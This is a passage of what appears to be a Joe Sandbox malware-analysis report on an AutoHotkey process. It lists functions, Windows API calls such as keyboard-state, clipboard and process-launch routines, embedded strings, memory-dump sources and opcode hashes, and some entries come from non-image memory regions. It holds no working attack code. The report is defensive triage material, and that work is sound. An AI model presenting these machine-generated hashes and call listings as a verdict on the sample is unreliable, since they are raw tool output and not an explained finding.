                                      • Sleep.KERNEL32(00000002,00000000,048746A2,?,00000001), ref: 04874682
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSleepWrite
                                      • String ID:
                                      • API String ID: 1443029356-0
                                      • Opcode ID: c23387efbe7a08dd00ed3dbaafa546ac01b5c4794a2b51c079ffa1c49a3ba0b4
                                      • Instruction ID: 6e2084d38e87ca8433795a1f3a64cd986e4ad87cb5bae91f82e6b091d590b330
                                      • Opcode Fuzzy Hash: c23387efbe7a08dd00ed3dbaafa546ac01b5c4794a2b51c079ffa1c49a3ba0b4
                                      • Instruction Fuzzy Hash: 85F0A93060460CFFE701EB6CCC51A9DB7F8DB45704F504A719514D3650EBB4BE00DA11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0487518D Relevance: 1.3, APIs: 1, Instructions: 3sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000002,04875BA6,00000000,04875BC1), ref: 0487518E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 4a6a9ff478d8471613e68ed5950632d719ecdef18c16d9231ea721654ab0c535
                                      • Instruction ID: 291952e6025789769b85e625f438fa04808133a7c0bd4156c8f520b9b1e4161b
                                      • Opcode Fuzzy Hash: 4a6a9ff478d8471613e68ed5950632d719ecdef18c16d9231ea721654ab0c535
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 048B3B3D Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, Offset: 048AA000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_48aa000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction ID: 78e4ba4547e8dff531cb66cb15c26eaf3ec346b51f076802617d439c23f133a4
                                      • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction Fuzzy Hash: A931E621204645BFEB224AE88C21BE6B758BF12328F510F15EDEAD3781E770B564C7E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0041F800 Relevance: 162.0, APIs: 45, Strings: 46, Instructions: 2772COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _memmove$__wcsnicmp
                                      • String ID: & $#CommentFlag$%s up::$%s%s%s$%s::$<>=/|^,:$<>=/|^,:.+-*&!?~$?*- $@$@$AltTab$AltTabAndMenu$AltTabMenu$AltTabMenuDismiss$Continuation section too long.$Default$Duplicate hotkey.$Duplicate label.$Functions cannot contain functions.$Get$Hotkeys/hotstrings are not allowed inside functions.$IfWin should be #IfWin.$Invalid single-line hotkey/hotstring.$Join$LTrim$Missing ")"$Missing "{"$Missing "}"$Not a valid method, class or property definition.$Not a valid property getter/setter.$Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.$OnClipboardChange$Out of memory.$RTrim$Return$Set$ShiftAltTab$Static$This hotstring is missing its abbreviation.$This line does not contain a recognized action.$and$if not GetKeyState("%s")${Blind}%s%s{%s DownR}${Blind}{%s Up}${LCtrl up}${RCtrl up}
                                      • API String ID: 1111699894-2406232025
                                      • Opcode ID: b991970de2a430f60c99b32bb1d73b5f463ebb95efc4c14f56d7c003954726a9
                                      • Instruction ID: 1f6b0364eb161c12d2371a5075a467368e5717f92921509a5db4fd246407d96f
                                      • Opcode Fuzzy Hash: b991970de2a430f60c99b32bb1d73b5f463ebb95efc4c14f56d7c003954726a9
                                      • Instruction Fuzzy Hash: 652314717043209ADB309F24A8417BBB7E0AFA5304F94452FE88587392E77D9D85C79B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414870 Relevance: 144.8, APIs: 68, Strings: 14, Instructions: 1338keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsnicmp.LIBCMT ref: 004148A9
                                      • __wcsnicmp.LIBCMT ref: 004148D7
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00414975
                                      • AttachThreadInput.USER32(000013F0,00000000,00000001), ref: 004149AD
                                      • GetTickCount.KERNEL32 ref: 004149CD
                                      • GetCurrentThreadId.KERNEL32 ref: 00414A0F
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00414A48
                                      • GetAsyncKeyState.USER32(0000005C), ref: 00414A56
                                      • GetForegroundWindow.USER32 ref: 00414AB5
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00414AC9
                                      • GetGUIThreadInfo.USER32(00000000,?), ref: 00414ADF
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00414AF6
                                      • GetKeyboardLayout.USER32(00000000), ref: 00414AFB
                                      • GetTickCount.KERNEL32 ref: 00414B50
                                      • BlockInput.USER32(00000001), ref: 00414C7F
                                      • GetTickCount.KERNEL32 ref: 00414CB6
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00414CDB
                                      • GetTickCount.KERNEL32 ref: 00414D05
                                      • _wcschr.LIBCMT ref: 00414D23
                                      • _free.LIBCMT ref: 004156E6
                                      • GetTickCount.KERNEL32 ref: 0041571D
                                      • GetAsyncKeyState.USER32(000000A0), ref: 0041578E
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004157A3
                                      • GetAsyncKeyState.USER32(000000A2), ref: 004157B8
                                      • GetAsyncKeyState.USER32(000000A3), ref: 004157CD
                                      • GetAsyncKeyState.USER32(000000A4), ref: 004157E2
                                      • GetAsyncKeyState.USER32(000000A5), ref: 004157F7
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00415809
                                      • GetAsyncKeyState.USER32(0000005C), ref: 0041581B
                                      • GetTickCount.KERNEL32 ref: 00415847
                                      • GetKeyState.USER32(00000014), ref: 004158FD
                                      • GetKeyState.USER32(00000014), ref: 00415905
                                      • GetForegroundWindow.USER32(00000000), ref: 00415939
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00415940
                                      • AttachThreadInput.USER32(000013F0,?,00000000), ref: 00415977
                                      • BlockInput.USER32(00000000), ref: 0041598A
                                      • GetForegroundWindow.USER32(00000000), ref: 004159C1
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 004159C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: State$Async$Thread$Window$CountTick$Process$Input$Foreground$AttachBlock__wcsnicmp$CurrentInfoKeyboardLayoutMessagePeek_free_wcschr
                                      • String ID: 0$6Dd$@$@$ASC $Click$Down$Raw$Temp$Text$^+!#{}${Blind}${Click${Text}
                                      • API String ID: 2351639582-2613549127
                                      • Opcode ID: b7e2721a82e742bfa610aba42655fd02882d97a0f62c758ca71604329d8778c5
                                      • Instruction ID: c3c0f8d46686c6f958d5c087e36318339bae220bd0f59bf9fa7e04c04916dbcb
                                      • Opcode Fuzzy Hash: b7e2721a82e742bfa610aba42655fd02882d97a0f62c758ca71604329d8778c5
                                      • Instruction Fuzzy Hash: CAB22771904244EBDB10DF64DC41BEE3BB1AF95314F18406BE845AB382D7789D85CBAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043B100 Relevance: 88.1, APIs: 32, Strings: 18, Instructions: 610processlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 0043B167
                                      • __wcsicoll.LIBCMT ref: 0043B179
                                      • __wcsicoll.LIBCMT ref: 0043B18B
                                      • __wcsicoll.LIBCMT ref: 0043B19D
                                      • __wcsicoll.LIBCMT ref: 0043B1AF
                                      • __wcsicoll.LIBCMT ref: 0043B1C1
                                      • _memset.LIBCMT ref: 0043B368
                                      • __swprintf.LIBCMT ref: 0043B3EA
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,?), ref: 0043B483
                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,00000044,?), ref: 0043B495
                                      • CloseHandle.KERNEL32(?), ref: 0043B4D6
                                      • _memset.LIBCMT ref: 0043B513
                                      • __wcsicoll.LIBCMT ref: 0043B55F
                                      • _wcschr.LIBCMT ref: 0043B5AB
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0043B6B6
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetProcessId), ref: 0043B6DA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0043B6E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$Handle$Close_memset$AddressCreateExecuteModuleProcProcessShell__swprintf_wcschr
                                      • String ID: Verb: <%s>$"%s" %s$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$...$.exe.bat.com.cmd.hta$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
                                      • API String ID: 3691946165-2616667029
                                      • Opcode ID: 5abcef5d06facff45b6314a4aafd58100ccc0af49607f7105370ac83bfe8da4b
                                      • Instruction ID: 5ca24864ffdfe391d9afc1f4fefd1a1fc3c9b0b0be8a4726113c0e62d7cb2fcb
                                      • Opcode Fuzzy Hash: 5abcef5d06facff45b6314a4aafd58100ccc0af49607f7105370ac83bfe8da4b
                                      • Instruction Fuzzy Hash: 9A22AD71E002099BDF20DF65CC46BAF77A4EF98304F04556BEA05A7381E7789944CBEA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004442E0 Relevance: 72.6, APIs: 36, Strings: 5, Instructions: 885windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign__wcsicoll$MetricsSystemWindow__wcsnicmp$ClientForegroundIconicRectScreen_wcsncpy_wcsrchrwcstoxl
                                      • String ID: Icon$Trans$dll$exe$ico
                                      • API String ID: 1615180671-2549557054
                                      • Opcode ID: 5cffa2d02b715339d04d368462fea6281d9516d45dcbc2f7cec04f06c29c42de
                                      • Instruction ID: 6781487cd69923d147860fce434f4b023b3ed7f3227315c4d7f94e20bdf9f24e
                                      • Opcode Fuzzy Hash: 5cffa2d02b715339d04d368462fea6281d9516d45dcbc2f7cec04f06c29c42de
                                      • Instruction Fuzzy Hash: 8462DEB1A083419FE724DF258880B6BBBE4AFC5704F14492EF58597381E778D845CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004260F0 Relevance: 62.5, APIs: 13, Strings: 22, Instructions: 1239COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: <>=/|^,:*&~!()[]{}"$ <>=/|^,:*&~!()[]{}+-?$ <>=/|^,:*&~!()[]{}+-?.$ =$'\;`$($+$A label must not point to an ELSE or UNTIL or CATCH.$Ambiguous or invalid use of "."$Divide by zero$Missing close-quote$Not allowed as an output variable.$Out of memory.$Parameter #2 invalid.$Parameter #2 required$Parameter #3 invalid.$Parse$Quote marks are required around this key.$SMHD$The leftmost character above is illegal in an expression.$Too many var/func refs.$Unexpected %
                                      • API String ID: 3832890014-3913940891
                                      • Opcode ID: 4e9acc68733d71761e00002537f0154bf6dc513c63535190e0ba9a5c7405b02e
                                      • Instruction ID: f4b49cb2a5af36337f388e1733ae10676f5a2c611ddfa226361d74bc3980114f
                                      • Opcode Fuzzy Hash: 4e9acc68733d71761e00002537f0154bf6dc513c63535190e0ba9a5c7405b02e
                                      • Instruction Fuzzy Hash: 7FA205717043618ADB209F15E8407BBB7E1AF91314F96446FE8858B381E77CDC85C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C240 Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 452threadkeyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(0002044A,0000041E,00000000,?), ref: 0040C301
                                      • GetForegroundWindow.USER32 ref: 0040C37C
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040C396
                                      • GetGUIThreadInfo.USER32(00000000,?), ref: 0040C3AE
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040C3C6
                                      • GetKeyboardLayout.USER32(00000000), ref: 0040C3CB
                                      • GetClassNameW.USER32(00000000,?,0000001C), ref: 0040C3F0
                                      • __wcsicoll.LIBCMT ref: 0040C403
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,00000000), ref: 0040C499
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,00000000), ref: 0040C4BE
                                      • GetKeyState.USER32(00000014), ref: 0040C517
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,00000000), ref: 0040C582
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C67B
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C75F
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C794
                                      • _memset.LIBCMT ref: 0040C7C7
                                      • ToUnicodeEx.USER32(?,?,?,?,00000002,00000000,?), ref: 0040C811
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Unicode$ThreadWindow$Process$ClassForegroundInfoKeyboardLayoutMessageNamePostState__wcsicoll_memset
                                      • String ID: 0$ApplicationFrameWindow
                                      • API String ID: 1795949194-1469001145
                                      • Opcode ID: 96dc43f701551e9b8907ddb99e0c0740473af773b2777b2ceee3ceb27f2bce96
                                      • Instruction ID: fc26394d7529ecc9bf4bda175551f6bc0fe6c8818d9b59603b6b3f170d38348c
                                      • Opcode Fuzzy Hash: 96dc43f701551e9b8907ddb99e0c0740473af773b2777b2ceee3ceb27f2bce96
                                      • Instruction Fuzzy Hash: 78F13A31508380DED721CB24D894BBB7BE4EB8A704F04463FE885973D2D7789949D7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004427E0 Relevance: 28.4, APIs: 10, Strings: 6, Instructions: 441windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041CA90: __wcsicoll.LIBCMT ref: 0041CAAB
                                        • Part of subcall function 0041CA90: __wcsicoll.LIBCMT ref: 0041CAC1
                                      • GetForegroundWindow.USER32 ref: 00442859
                                      • IsWindowVisible.USER32(00000000), ref: 00442874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window__wcsicoll$ForegroundVisible
                                      • String ID: %s1$0x%06X$0x%08X$GetLayeredWindowAttributes$Parameter #2 invalid.$user32
                                      • API String ID: 1910143062-141734719
                                      • Opcode ID: 453a6aa50027174082cedce99cb7d4f061df8e7c1ec26787be7f105a86ab5a6b
                                      • Instruction ID: 2a0d6012060bb4b7cf7467790ff51c93513cd7879697af52335a722f09b628c9
                                      • Opcode Fuzzy Hash: 453a6aa50027174082cedce99cb7d4f061df8e7c1ec26787be7f105a86ab5a6b
                                      • Instruction Fuzzy Hash: 7ED124727043015BE720EF69AD81F6B73D8AB98314F504A2FF945972C1DAF8DC4483AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D570 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 223filewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32 ref: 0044D5A4
                                      • GetTickCount.KERNEL32 ref: 0044D5BB
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0044D5DE
                                      • GetTickCount.KERNEL32 ref: 0044D5F4
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044D6B5
                                      • FindClose.KERNEL32(00000000), ref: 0044D6C4
                                      • GetLastError.KERNEL32 ref: 0044D6DB
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0044D725
                                      • GetTickCount.KERNEL32 ref: 0044D73C
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0044D75F
                                      • GetTickCount.KERNEL32 ref: 0044D775
                                      • __swprintf.LIBCMT ref: 0044D7E6
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044D80C
                                      • FindClose.KERNEL32(00000000), ref: 0044D81B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Find$CountFileTick$CloseFirstMessageNextPeek$ErrorLast__swprintf
                                      • String ID: %s\%s$.
                                      • API String ID: 2043249117-2631528844
                                      • Opcode ID: a5495b4742bf325c753171301b87c755e6be2d3d861bb32ee9abc19556a7e317
                                      • Instruction ID: 60e6e54888df9337c150f74833bcb2375433215fda5bcd6b74ea0acd044e7332
                                      • Opcode Fuzzy Hash: a5495b4742bf325c753171301b87c755e6be2d3d861bb32ee9abc19556a7e317
                                      • Instruction Fuzzy Hash: 6281D9359043059FD720EF24D884BAB77E5EF84314F05492FF89687390EBB8A945C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405330 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 74clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$Clipboard$DataFormatName__wcsnicmp
                                      • String ID: Embed Source$Link Source$MSDEVColumnSelect$MSDEVLineSelect$Native$ObjectLink$OwnerLink
                                      • API String ID: 3127108255-1844231336
                                      • Opcode ID: 1369400820dd825248964eb8c27f6f12a8442828932965714ae623aefdcd4fc0
                                      • Instruction ID: 160f863454043d71a15cd635fa272db83c91929eb6ba05ad37da613675058f47
                                      • Opcode Fuzzy Hash: 1369400820dd825248964eb8c27f6f12a8442828932965714ae623aefdcd4fc0
                                      • Instruction Fuzzy Hash: 5011E47290030126DB20F7608D42BAF76D89F20702F54093EAC95D12C2F7BDDA18CAAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045C3A0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 163windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000001,?,?,00000000), ref: 0045C403
                                      • IsIconic.USER32(00000000), ref: 0045C410
                                      • GetWindowRect.USER32(00000000,?), ref: 0045C424
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0045C474
                                        • Part of subcall function 00443AD0: GetForegroundWindow.USER32 ref: 00443BC1
                                        • Part of subcall function 00443AD0: IsIconic.USER32(00000000), ref: 00443BD0
                                        • Part of subcall function 00443AD0: GetWindowRect.USER32(?,?), ref: 00443BE8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundIconicRect$Create
                                      • String ID: 0x%06X$Alt$DISPLAY$RGB$Slow
                                      • API String ID: 472947238-780868468
                                      • Opcode ID: 814949ed51662adac389453c6611237bf09c4d221aaef5d41941407a7515d679
                                      • Instruction ID: 99112cdcc19f8f63909ba898ffbc545652ef35aab0819a49b9b2df07c7d25289
                                      • Opcode Fuzzy Hash: 814949ed51662adac389453c6611237bf09c4d221aaef5d41941407a7515d679
                                      • Instruction Fuzzy Hash: C141F7317443006BD210AB659C81F7F7798EB86716F10052BFE51962C2DAA99C0987BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00483160 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Clipboard$CloseEmptyGlobalUnlock
                                      • String ID: Can't open clipboard for writing.$GlobalLock$Out of memory.
                                      • API String ID: 219879227-2567692066
                                      • Opcode ID: 8f3b26adc78bcdb9eb79fa024ea01f02febe4a29d5a66cc4ef47170832be32b1
                                      • Instruction ID: c57421b41dc4e990d6799bc134f68bd9a405de37a936a3b3bf9b31c77ae85033
                                      • Opcode Fuzzy Hash: 8f3b26adc78bcdb9eb79fa024ea01f02febe4a29d5a66cc4ef47170832be32b1
                                      • Instruction Fuzzy Hash: 87419E36901214DBDB10BF69AC4D66F7B64EB85F0BB01067FE84692320DB7989448BDD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405160 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100clipboardCOMMON
                                      Download Yara Rule
                                      APIs
